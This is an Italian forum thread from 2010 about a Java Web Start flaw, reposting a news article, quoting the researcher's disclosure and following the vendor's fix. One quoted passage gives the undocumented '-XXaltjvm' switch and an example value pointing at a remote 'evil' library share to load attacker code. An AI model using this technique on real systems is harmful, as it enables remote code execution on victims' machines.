[Java] falla segnalata...

ally · 13-04-2010, 12:49

...ciao...

...forse un thread fuori dal comune per questa sezione ma posto comuqnue questa news...

Ti trovi in: Ict Business Software E Sicurezza
Java ha una grave falla, tutti i Windows minacciati
di Valerio Porcu
Martedì 13 aprile 2010
Stampa Commenti (17) Condividi4 Buzz it
È emersa una falla in Java che permette l'esecuzione di codice arbitrario sul computer della vittima. Nessuna soluzione per ora, tranne alcune correzioni parziali da eseguire in locale.

Java nasconde una grave minaccia per tutte le versioni di Windows. Secondo due diversi ricercatori, infatti, Java Web Start framework (JWSF, che semplifica lo sviluppo delle applicazioni) può essere sfruttato per creare siti pericolosi.

Come altri attacchi, anche in questo caso il primo passo è indurre l'utente a visitare una pagina web disegnata ad hoc o compromessa. Qui un tag HTML permetterebbe ad un malintenzionato di eseguire codice arbitrario pericoloso.

Tutti i browser esistenti sono in pericolo, proprio perché la vulnerabilità è nel plug-in, e non nel browser stesso. Disabilitare il plug-in non risolvere il problema, perché il componente usato come veicolo, JWSF, è installato separatamente, come parte dell'ambiente Java. In altre parole chiunque abbia una versione recente di Java è potenzialmente a rischio.

"Java.exe e javaw.exe supportano una parametro da linea di comando nascosto e non documentato. Permette di caricare una libreria JavaVM alternativa (jvm.dll o libjvm.so)", e saltare così tutte le misure di sicurezza.

Sun è stata informata del problema, e si attende ora un aggiornamento di Java. Tavis Ormandy, uno dei ricercatori, ha detto di aver diffuso le informazioni scoperte perché "è nell'interesse di tutti, tranne che in quelli del produttore". Il ricercatore ha anche creato una dimostrazione accessibile a tutti, a questo indirizzo.

Al momento esistono solo alcune soluzioni parziali, consigliate da Symantec. Si ritiene improbabile che possano essere colpiti anche Linux e Mac OS.

...ciao Andrea...

WarDuck · 13-04-2010, 13:08

"Si ritiene improbabile che vengano colpiti Linux e MacOS", se magari si degnassero di spiegare anche il motivo...

Ad ogni modo PRIVILEGI LIMITATI SEMPRE!

zakmckraken · 13-04-2010, 13:10

Per la cronaca
http://www.reversemode.com/index.php...id=67&Itemid=1

banryu79 · 13-04-2010, 13:43

Pare che il problema sia dovuto all'esistenza di due parametri non documentati, e alla mancanza di controlli stringenti sui parametri in input:

Quote:

java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe).This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...

Quote:

Originariamente inviato da WarDuck

"Si ritiene improbabile che vengano colpiti Linux e MacOS", se magari si degnassero di spiegare anche il motivo...

Tratto da qua: http://www.reversemode.com/index.php...id=67&Itemid=1 (il test case del tizio che ha scoperto questa vulnerabilità)

Quote:

Updated Although Linux contains vulnerable code, I was unable to exploit it in the same manner. It likely can be exploited by using the proper sequence of command-line arguments, but the sudden release didn't allow me to research into this issue.I was focused on Windows at the moment of the disclosure.

E qui:http://seclists.org/fulldisclosure/2010/Apr/119
leggo questa perla:

Quote:

-------------------
Solution
-----------------------

Sun has been informed about this vulnerability, however, they informed me they
do not consider this vulnerability to be of high enough priority to break their
quarterly patch cycle.

For various reasons, I explained that I did did not agree, and intended to
publish advice to temporarily disable the affected control until a solution is
available.

Be, dai, che vuoi che sia in fin dei conti?

cdimauro · 13-04-2010, 14:08

Buffoni. Non c'è da aggiungere altro.

xcdegasp · 13-04-2010, 15:39

un buon firewall che abbia modulo hips e dns di opendns.com possono arginare il problema

WarDuck · 13-04-2010, 16:04

Cmq non ho ben capito perché disattivando il plugin Java da Firefox sarebbe lo stesso vulnerabile.

PGI-Bis · 13-04-2010, 16:44

Questa mi fa morire.

Tu sei lì che per distribuire un programma java che una notte ha sognato di un tizio che pensava di chiedere all'utente di aprire un file (di testo) devi:

andare dal notaio col certificato di cresima per avere un codice hash da portare al ministero che ti fa un esame del dna da portare in ginocchio a lourdes, firmare tutto in modo tale che l'utente, lanciando il tuo programma, si trovi di fronte ad una finestra che dice "ma che cazzo stai facendo!!!".

Poi prendi apri una pagina internet a caso e ti scompare l'hard disk senza neanche dirti "be'".

Ti viene da dire: "ma allora vaffanculo!".

O no?

banryu79 · 13-04-2010, 16:57

Quote:

Originariamente inviato da PGI-Bis

O no?

Beh, dai, dopotutto il parametro XXaltjvm non è documentato... eccheccazzo, cosa pretendevi?
Va che ci vuole qualche voltagabbana a farlo spuntare fuori, oppure uno che ci si metta proprio proprio di impegno per sgamarlo...

Considerala come un'alternativa percorribile alla normale via crucis che solitamente toccherebbe propinarsi: Sun ha già detto che affronteranno il problema deprecando l'uso di quel parametro

gugoXX · 14-04-2010, 16:54

Coraggio.
Sara' gia' stata inserita nella priority list di Oracle Technet.

Fra 3-4 mesi verra' risolta.

PGI-Bis · 14-04-2010, 17:03

Le solite maldicenze su Oracle. Stanno solo cercando di capire a chi possono fatturare il fix.

astorcas · 14-04-2010, 20:56

what? no non ci credo...

PGI-Bis · 18-04-2010, 00:09

http://www.oracle.com/technology/dep...2010-0886.html

^TiGeRShArK^ · 18-04-2010, 00:28

'sti cazzi tanto mac os x non è vulnerabile.

gugoXX · 18-04-2010, 08:51

Bravi, l'hanno aggiustata.

13-04-2010, 12:49	#1
ally Bannato Iscritto dal: Jan 2003 Città: Messaggi: 4423	[Java] falla segnalata... ...ciao... ...forse un thread fuori dal comune per questa sezione ma posto comuqnue questa news... Ti trovi in: Ict Business Software E Sicurezza Java ha una grave falla, tutti i Windows minacciati di Valerio Porcu Martedì 13 aprile 2010 Stampa Commenti (17) Condividi4 Buzz it È emersa una falla in Java che permette l'esecuzione di codice arbitrario sul computer della vittima. Nessuna soluzione per ora, tranne alcune correzioni parziali da eseguire in locale. Java nasconde una grave minaccia per tutte le versioni di Windows. Secondo due diversi ricercatori, infatti, Java Web Start framework (JWSF, che semplifica lo sviluppo delle applicazioni) può essere sfruttato per creare siti pericolosi. Come altri attacchi, anche in questo caso il primo passo è indurre l'utente a visitare una pagina web disegnata ad hoc o compromessa. Qui un tag HTML permetterebbe ad un malintenzionato di eseguire codice arbitrario pericoloso. Tutti i browser esistenti sono in pericolo, proprio perché la vulnerabilità è nel plug-in, e non nel browser stesso. Disabilitare il plug-in non risolvere il problema, perché il componente usato come veicolo, JWSF, è installato separatamente, come parte dell'ambiente Java. In altre parole chiunque abbia una versione recente di Java è potenzialmente a rischio. "Java.exe e javaw.exe supportano una parametro da linea di comando nascosto e non documentato. Permette di caricare una libreria JavaVM alternativa (jvm.dll o libjvm.so)", e saltare così tutte le misure di sicurezza. Sun è stata informata del problema, e si attende ora un aggiornamento di Java. Tavis Ormandy, uno dei ricercatori, ha detto di aver diffuso le informazioni scoperte perché "è nell'interesse di tutti, tranne che in quelli del produttore". Il ricercatore ha anche creato una dimostrazione accessibile a tutti, a questo indirizzo. Al momento esistono solo alcune soluzioni parziali, consigliate da Symantec. Si ritiene improbabile che possano essere colpiti anche Linux e Mac OS. ...ciao Andrea...

13-04-2010, 14:08	#5
cdimauro Senior Member Iscritto dal: Jan 2002 Città: Germania Messaggi: 26110	Buffoni. Non c'è da aggiungere altro. __________________ Per iniziare a programmare c'è solo Python con questo o quest'altro (più avanzato) libro @LinkedIn Non parlo in alcun modo a nome dell'azienda per la quale lavoro Ho poco tempo per frequentare il forum; eventualmente, contattatemi in PVT o nel mio sito. Fanboys

13-04-2010, 15:39	#6
xcdegasp Senior Member Iscritto dal: Nov 2001 Città: Fidenza(pr) da Trento Messaggi: 27479	un buon firewall che abbia modulo hips e dns di opendns.com possono arginare il problema __________________ "Visti da vicino siamo tutti strani..." ~\|~ What Defines a Community? ~\|~ Thread eMule Ufficiale ~\|~ Online Armor in Italiano ~\|~ Regole di Sezione ~\|► Guida a PrivateFirewall quinto potere ~\|~ Le illusioni della TV

13-04-2010, 16:44	#8
PGI-Bis Senior Member Iscritto dal: Nov 2004 Città: Tra Verona e Mantova Messaggi: 4553	Questa mi fa morire. Tu sei lì che per distribuire un programma java che una notte ha sognato di un tizio che pensava di chiedere all'utente di aprire un file (di testo) devi: andare dal notaio col certificato di cresima per avere un codice hash da portare al ministero che ti fa un esame del dna da portare in ginocchio a lourdes, firmare tutto in modo tale che l'utente, lanciando il tuo programma, si trovi di fronte ad una finestra che dice "ma che cazzo stai facendo!!!". Poi prendi apri una pagina internet a caso e ti scompare l'hard disk senza neanche dirti "be'". Ti viene da dire: "ma allora vaffanculo!". O no? __________________ Uilliam Scecspir ti fa un baffo? Gioffri Cioser era uno straccione? E allora blogga anche tu, in inglese come me!

14-04-2010, 16:54	#10
gugoXX Senior Member Iscritto dal: May 2004 Città: Londra (Torino) Messaggi: 3692	Coraggio. Sara' gia' stata inserita nella priority list di Oracle Technet. Fra 3-4 mesi verra' risolta. __________________ Se pensi che il tuo codice sia troppo complesso da capire senza commenti, e' segno che molto probabilmente il tuo codice e' semplicemente mal scritto. E se pensi di avere bisogno di un nuovo commento, significa che ti manca almeno un test.

13-04-2010, 13:08	#2
WarDuck Senior Member Iscritto dal: May 2001 Messaggi: 12966	"Si ritiene improbabile che vengano colpiti Linux e MacOS", se magari si degnassero di spiegare anche il motivo... Ad ogni modo PRIVILEGI LIMITATI SEMPRE!

13-04-2010, 13:10	#3
zakmckraken Member Iscritto dal: Apr 2004 Messaggi: 56	Per la cronaca http://www.reversemode.com/index.php...id=67&Itemid=1

13-04-2010, 16:04	#7
WarDuck Senior Member Iscritto dal: May 2001 Messaggi: 12966	Cmq non ho ben capito perché disattivando il plugin Java da Firefox sarebbe lo stesso vulnerabile.

14-04-2010, 17:03	#11
PGI-Bis Senior Member Iscritto dal: Nov 2004 Città: Tra Verona e Mantova Messaggi: 4553	Le solite maldicenze su Oracle. Stanno solo cercando di capire a chi possono fatturare il fix. __________________ Uilliam Scecspir ti fa un baffo? Gioffri Cioser era uno straccione? E allora blogga anche tu, in inglese come me!

14-04-2010, 20:56	#12
astorcas Senior Member Iscritto dal: Jan 2005 Città: Siena Messaggi: 1313	what? no non ci credo...

18-04-2010, 00:09	#13
PGI-Bis Senior Member Iscritto dal: Nov 2004 Città: Tra Verona e Mantova Messaggi: 4553	http://www.oracle.com/technology/dep...2010-0886.html __________________ Uilliam Scecspir ti fa un baffo? Gioffri Cioser era uno straccione? E allora blogga anche tu, in inglese come me!

18-04-2010, 00:28	#14
^TiGeRShArK^ Senior Member Iscritto dal: Jul 2002 Città: Reggio Calabria -> London Messaggi: 12112	'sti cazzi tanto mac os x non è vulnerabile. __________________

18-04-2010, 08:51	#15
gugoXX Senior Member Iscritto dal: May 2004 Città: Londra (Torino) Messaggi: 3692	Bravi, l'hanno aggiustata. __________________ Se pensi che il tuo codice sia troppo complesso da capire senza commenti, e' segno che molto probabilmente il tuo codice e' semplicemente mal scritto. E se pensi di avere bisogno di un nuovo commento, significa che ti manca almeno un test.

Strumenti
Mostra una versione stampabile Invia questa pagina per email